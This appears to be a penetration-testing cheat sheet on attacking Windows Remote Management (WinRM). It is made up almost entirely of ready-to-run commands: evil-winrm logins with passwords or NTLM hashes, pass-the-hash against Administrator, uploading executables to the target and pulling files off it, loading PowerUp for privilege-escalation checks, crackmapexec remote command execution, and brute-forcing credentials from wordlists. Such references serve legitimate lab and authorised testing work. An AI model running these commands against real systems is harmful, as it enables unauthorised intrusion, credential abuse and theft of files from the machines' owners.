Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Service Detection
nmap -sV -sC -p 5985,5986 TARGET
| Port | Protocol |
|---|
| 5985 | HTTP (WinRM) |
| 5986 | HTTPS (WinRM) |
Evil-WinRM
evil-winrm -i TARGET -u user -p 'password'
evil-winrm -i TARGET -u user -H NTLM_HASH
With SSL
evil-winrm -i TARGET -u user -p 'password' -S
Upload / Download
*Evil-WinRM* PS> upload /local/path/file.exe C:\Windows\Temp\file.exe
*Evil-WinRM* PS> download C:\Users\admin\Desktop\flag.txt /tmp/flag.txt
Load PowerShell Scripts
evil-winrm -i TARGET -u user -p 'password' -s /opt/scripts/
*Evil-WinRM* PS> PowerUp.ps1
*Evil-WinRM* PS> Invoke-AllChecks
CrackMapExec
crackmapexec winrm TARGET -u user -p password
crackmapexec winrm TARGET -u user -H NTLM_HASH
crackmapexec winrm TARGET -u user -p password -x "whoami"
crackmapexec winrm TARGET -u user -p password -X "Get-Process"
| Flag | Description |
|---|
-x | CMD command |
-X | PowerShell command |
PowerShell Remoting (From Windows)
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
Execute Command
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }
Brute-Force
crackmapexec winrm TARGET -u users.txt -p passwords.txt
Pass-the-Hash
evil-winrm -i TARGET -u Administrator -H aad3b435b51404eeaad3b435b51404ee:NTLM_HASH
Quick Reference
| Check | Command |
|---|
| Login | evil-winrm -i TARGET -u user -p pass |
| PtH | evil-winrm -i TARGET -u user -H HASH |
| Exec CMD | crackmapexec winrm TARGET -u user -p pass -x "whoami" |
| Brute-force | crackmapexec winrm TARGET -u users.txt -p pass.txt |